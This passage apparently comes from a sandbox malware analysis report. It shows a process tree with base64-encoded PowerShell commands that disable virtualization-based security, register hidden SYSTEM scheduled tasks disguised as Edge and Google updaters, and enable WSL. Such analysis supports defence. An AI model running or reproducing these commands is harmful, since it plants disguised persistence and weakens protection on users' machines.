AHQAeQAgACIASABLAEMAVQA6AFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACIAIAAtAE4AYQBtAGUAIAAiAEEAbABsAG8AdwBDAG8AcgB0AGEAbgBhACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwARABlAHYAaQBjAGUARwB1AGEAcgBkACIAIAAtAE4AYQBtAGUAIAAiAEUAbgBhAGIAbABlAFYAaQByAHQAdQBhAGwAaQB6AGEAdABpAG8AbgBCAGEAcwBlAGQAUwBlAGMAdQByAGkAdAB5ACIAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABEAGUAdgBpAGMAZQBHAHUAYQByAGQAIgAgAC0ATgBhAG0AZQAgACIARQBuAGEAYgBsAGUAVgBpAHIAdAB1AGEAbABpAHoAYQB0AGkAbwBuAEIAYQBzAGUAZABTAGUAYwB1AHIAaQB0AHkAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwARABlAHYAaQBjAGUARwB1AGEAcgBkACIAIAAtAE4AYQBtAGUAIAAiAEUAbgBhAGIAbABlAFYAaQByAHQAdQBhAGwAaQB6AGEAdABpAG8AbgBCAGEAcwBlAGQAUwBlAGMAdQByAGkAdAB5ACIAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABEAGUAdgBpAGMAZQBHAHUAYQByAGQAIgAgAC0ATgBhAG0AZQAgACIARQBuAGEAYgBsAGUAVgBpAHIAdAB1AGEAbABpAHoAYQB0AGkAbwBuAEIAYQBzAGUAZABTAGUAYwB1AHIAaQB0AHkAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABEAGUAdgBpAGMAZQBHAHUAYQByAGQAIgAgAC0ATgBhAG0AZQAgACIAUgBlAHEAdQBpAHIAZQBQAGwAYQB0AGYAbwByAG0AUwBlAGMAdQByAGkAdAB5AEYAZQBhAHQAdQByAGUAcwAiACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwARABlAHYAaQBjAGUARwB1AGEAcgBkACIAIAAtAE4AYQBtAGUAIAAiAFIAZQBxAHUAaQByAGUAUABsAGEAdABmAG8AcgBtAFMAZQBjAHUAcgBpAHQAeQBGAGUAYQB0AHUAcgBlAHMAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwARABlAHYAaQBjAGUARwB1AGEAcgBkACIAIAAtAE4AYQBtAGUAIAAiAFIAZQBxAHUAaQByAGUAUABsAGEAdABmAG8AcgBtAFMAZQBjAHUAcgBpAHQAeQBGAGUAYQB0AHUAcgBlAHMAIgAgAC0AVgBhAGwAdQBlACAAMAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEQAZQB2AGkAYwBlAEcAdQBhAHIAZAAiACAALQBOAGEAbQBlACAAIgBSAGUAcQB1AGkAcgBlAFAAbABhAHQAZgBvAHIAbQBTAGUAYwB1AHIAaQB0AHkARgBlAGEAdAB1AHIAZQBzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAUwBlAHMAcwBpAG8AbgAgAE0AYQBuAGEAZwBlAHIAXABNAGUAbQBvAHIAeQAgAE0AYQBuAGEAZwBlAG0AZQBuAHQAIgAgAC0ATgBhAG0AZQAgACIATABhAHIAZwBlAFAAYQBnAGUATQBpAG4AaQBtAHUAbQAiACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAUwBlAHMAcwBpAG8AbgAgAE0AYQBuAGEAZwBlAHIAXABNAGUAbQBvAHIAeQAgAE0AYQBuAGEAZwBlAG0AZQBuAHQAIgAgAC0ATgBhAG0AZQAgACIATABhAHIAZwBlAFAAYQBnAGUATQBpAG4AaQBtAHUAbQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABTAGUAcwBzAGkAbwBuACAATQBhAG4AYQBnAGUAcgBcAE0AZQBtAG8AcgB5ACAATQBhAG4AYQBnAGUAbQBlAG4AdAAiACAALQBOAGEAbQBlACAAIgBMAGEAcgBnAGUAUABhAGcAZQBNAGkAbgBpAG0AdQBtACIAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABTAGUAcwBzAGkAbwBuACAATQBhAG4AYQBnAGUAcgBcAE0AZQBtAG8AcgB5ACAATQBhAG4AYQBnAGUAbQBlAG4AdAAiACAALQBOAGEAbQBlACAAIgBMAGEAcgBnAGUAUABhAGcAZQBNAGkAbgBpAG0AdQBtACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAA==
        6⤵
        Modifies Windows Defender notification settings
        UAC bypass
        
        PID:3968
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:7536
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAYQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACAALQBXAG8AcgBrAGkAbgBnAEQAaQByAGUAYwB0AG8AcgB5ACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgA7AAoAJAB0AHIAaQBnAGcAZQByAEQAYQBpAGwAeQAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ARABhAGkAbAB5ACAALQBBAHQAIAAiADAAMAA6ADAAMAAiADsACgAkAHQAcgBpAGcAZwBlAHIATABvAGcAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuADsACgAkAHMAZQB0AHQAaQBuAGcAcwAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAFMAdABhAHIAdABXAGgAZQBuAEEAdgBhAGkAbABhAGIAbABlACAALQBIAGkAZABkAGUAbgAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgADAAOwAKAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIATQBpAGMAcgBvAHMAbwBmAHQARQBkAGcAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAQwBvAHIAZQB7AEIAOABBAEMAMQA2ADYAOAAtADkANwBEADIALQA0ADIARABCAC0AOQA0AEQAQgAtAEQAMwAyAEQARQA1ADAANQA4ADgAQQAxAH0AIgAgAC0AQQBjAHQAaQBvAG4AIAAkAGEAYwB0AGkAbwBuACAALQBUAHIAaQBnAGcAZQByACAAJAB0AHIAaQBnAGcAZQByAEQAYQBpAGwAeQAsACAAJAB0AHIAaQBnAGcAZQByAEwAbwBnAG8AbgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABzAGUAdAB0AGkAbgBnAHMAIAAtAFIAdQBuAEwAZQB2AGUAbAAgAEgAaQBnAGgAZQBzAHQAIAAtAFUAcwBlAHIAIAAiAFMAWQBTAFQARQBNACIACgAKACQAYQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAFcAbwByAGsAaQBuAGcARABpAHIAZQBjAHQAbwByAHkAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiADsACgAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgACIAMAAwADoAMAAwACIAOwAKACQAdAByAGkAZwBnAGUAcgBMAG8AZwBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AOwAKACQAcwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0AUwB0AGEAcgB0AFcAaABlAG4AQQB2AGEAaQBsAGEAYgBsAGUAIAAtAEgAaQBkAGQAZQBuACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAMAA7AAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrACIAIAAtAEEAYwB0AGkAbwBuACAAJABhAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAdAByAGkAZwBnAGUAcgBEAGEAaQBsAHkALAAgACQAdAByAGkAZwBnAGUAcgBMAG8AZwBvAG4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACQAcwBlAHQAdABpAG4AZwBzACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBVAHMAZQByACAAIgBTAFkAUwBUAEUATQAiAAoACgAkAGEAYwB0AGkAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAgAC0AVwBvAHIAawBpAG4AZwBEAGkAcgBlAGMAdABvAHIAeQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiADsACgAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgACIAMAAwADoAMAAwACIAOwAKACQAdAByAGkAZwBnAGUAcgBMAG8AZwBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AOwAKACQAcwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0AUwB0AGEAcgB0AFcAaABlAG4AQQB2AGEAaQBsAGEAYgBsAGUAIAAtAEgAaQBkAGQAZQBuACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAMAA7AAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAFMAeQBzAHQAZQBtAF8AMQBEADkANAA2ADUAMABfAFgATQA3AFQAIgAgAC0AQQBjAHQAaQBvAG4AIAAkAGEAYwB0AGkAbwBuACAALQBUAHIAaQBnAGcAZQByACAAJAB0AHIAaQBnAGcAZQByAEQAYQBpAGwAeQAsACAAJAB0AHIAaQBnAGcAZQByAEwAbwBnAG8AbgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABzAGUAdAB0AGkAbgBnAHMAIAAtAFIAdQBuAEwAZQB2AGUAbAAgAEgAaQBnAGgAZQBzAHQAIAAtAFUAcwBlAHIAIAAiAFMAWQBTAFQARQBNACIACgAKACQAYQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAIgBFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAgAC0AVwBvAHIAawBpAG4AZwBEAGkAcgBlAGMAdABvAHIAeQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiADsACgAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgACIAMAAwADoAMAAwACIAOwAKACQAdAByAGkAZwBnAGUAcgBMAG8AZwBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AOwAKACQAcwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0AUwB0AGEAcgB0AFcAaABlAG4AQQB2AGEAaQBsAGEAYgBsAGUAIAAtAEgAaQBkAGQAZQBuACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAMAA7AAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBOAHYAVABtAFIAZQBwAF8AQwByAGEAcwBoAFIAZQBwAG8AcgB0AF8ARAAyAEUARgAxADgAMwA4ADYAQwA3AEQAQwA0ADYAQwAiACAALQBBAGMAdABpAG8AbgAgACQAYQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACwAIAAkAHQAcgBpAGcAZwBlAHIATABvAGcAbwBuACAALQBTAGUAdAB0AGkAbgBnAHMAIAAkAHMAZQB0AHQAaQBuAGcAcwAgAC0AUgB1AG4ATABlAHYAZQBsACAASABpAGcAaABlAHMAdAAgAC0AVQBzAGUAcgAgACIAUwBZAFMAVABFAE0AIgAKAAoAJABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAiAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiACAALQBXAG8AcgBrAGkAbgBnAEQAaQByAGUAYwB0AG8AcgB5ACAAIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgA7AAoAJAB0AHIAaQBnAGcAZQByAEQAYQBpAGwAeQAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ARABhAGkAbAB5ACAALQBBAHQAIAAiADAAMAA6ADAAMAAiADsACgAkAHQAcgBpAGcAZwBlAHIATABvAGcAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuADsACgAkAHMAZQB0AHQAaQBuAGcAcwAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAFMAdABhAHIAdABXAGgAZQBuAEEAdgBhAGkAbABhAGIAbABlACAALQBIAGkAZABkAGUAbgAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgADAAOwAKAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIATQBpAGMAcgBvAHMAbwBmAHQARQBkAGcAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAVQBBAHsAMAA2ADQAMgA4ADIANwA5AC0ANABCADkAQgAtADQAMwBDAEMALQBEADYARgAyAC0AQgAyAEYAOQA4ADAAQQBDADQANwA0ADAAfQAiACAALQBBAGMAdABpAG8AbgAgACQAYQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAHQAcgBpAGcAZwBlAHIARABhAGkAbAB5ACwAIAAkAHQAcgBpAGcAZwBlAHIATABvAGcAbwBuACAALQBTAGUAdAB0AGkAbgBnAHMAIAAkAHMAZQB0AHQAaQBuAGcAcwAgAC0AUgB1AG4ATABlAHYAZQBsACAASABpAGcAaABlAHMAdAAgAC0AVQBzAGUAcgAgACIAUwBZAFMAVABFAE0AIgAKAA==
        6⤵
        
        PID:1196
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:3824
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAGQAaQBzAG0ALgBlAHgAZQAgAC8AbwBuAGwAaQBuAGUAIAAvAGUAbgBhAGIAbABlAC0AZgBlAGEAdAB1AHIAZQAgAC8AZgBlAGEAdAB1AHIAZQBuAGEAbQBlADoATQBpAGMAcgBvAHMAbwBmAHQALQBXAGkAbgBkAG8AdwBzAC0AUwB1AGIAcwB5AHMAdABlAG0ALQBMAGkAbgB1AHgAIAAvAGEAbABsACAALwBuAG8AcgBlAHMAdABhAHIAdAAKAGQAaQBzAG0ALgBlAHgAZQAgAC8AbwBuAGwAaQBuAGUAIAAvAGUAbgBhAGIAbABlAC0AZgBlAGEAdAB1AHIAZQAgAC8AZgBlAGEAdAB1AHIAZQBuAGEAbQBlADoAVgBpAHIAdAB1AGEAbABNAGEAYwBoAGkAbgBlAFAAbABhAHQAZgBvAHIAbQAgAC8AYQBsAGwAIAAvAG4AbwByAGUAcwB0AGEAcgB0AAoAdwBzAGwAIAAtAC0AcwBlAHQALQBkAGUAZgBhAHUAbAB0AC0AdgBlAHIAcwBpAG8AbgAgADIACgAKACQAcABhAGcAZQBmAGkAbABlACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBDAG8AbQBwAHUAdABlAHIAUwB5AHMAdABlAG0AIAAtAEUAbgBhAGIAbABlAEEAbABsAFAAcgBpAHYAaQBsAGUAZwBlAHMACgAkAHAAYQBnAGUAZgBpAGwAZQAuAEEAdQB0AG8AbQBhAHQAaQBjAE0AYQBuAGEAZwBlAGQAUABhAGcAZQBmAGkAbABlACAAPQAgACQAZgBhAGwAcwBlAAoAJABwAGEAZwBlAGYAaQBsAGUALgBwAHUAdAAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAYQBnAGUARgBpAGwAZQBTAGUAdAB0AGkAbgBnAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQALgBJAG4AaQB0AGkAYQBsAFMAaQB6AGUAIAA9ACAANAAwADkANgAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4ATQBhAHgAaQBtAHUAbQBTAGkAegBlACAAPQAgADEANgAzADgANAAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4AUAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKAAoARwBlAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAFAAYQB0AGgAIAAiAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwATQBlAG0AbwByAHkARABpAGEAZwBuAG8AcwB0AGkAYwBcACIAIAB8ACAARABpAHMAYQBiAGwAZQAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsACgBEAGkAcwBhAGIAbABlAC0ATQBNAEEAZwBlAG4AdAAgAC0AbQBjAAoACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAEgAaQBnAGgAUABlAHIAZgBvAHIAbQBhAG4AYwBlAFAAbwB3AGUAcgBQAGwAYQBuAEcAdQBpAGQAIAB7AAoAIAAgACAAIAAkAHAAbwB3AGUAcgBQAGwAYQBuAHMAIAA9ACAAcABvAHcAZQByAGMAZgBnACAALwBsAGkAcwB0ACAAfAAgAFMAZQBsAGUAYwB0AC0AUwB0AHIAaQBuAGcAIAAtAFAAYQB0AHQAZQByAG4AIAAiAEcAVQBJAEQAIgAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABfACAALQBtAGEAdABjAGgAIAAiAC4AKgBcACgAKAAuACoAPwApAFwAKQAuACoAIgApACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZwB1AGkAZAAgAD0AIAAkAG0AYQB0AGMAaABlAHMAWwAxAF0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAXwAgAC0AbQBhAHQAY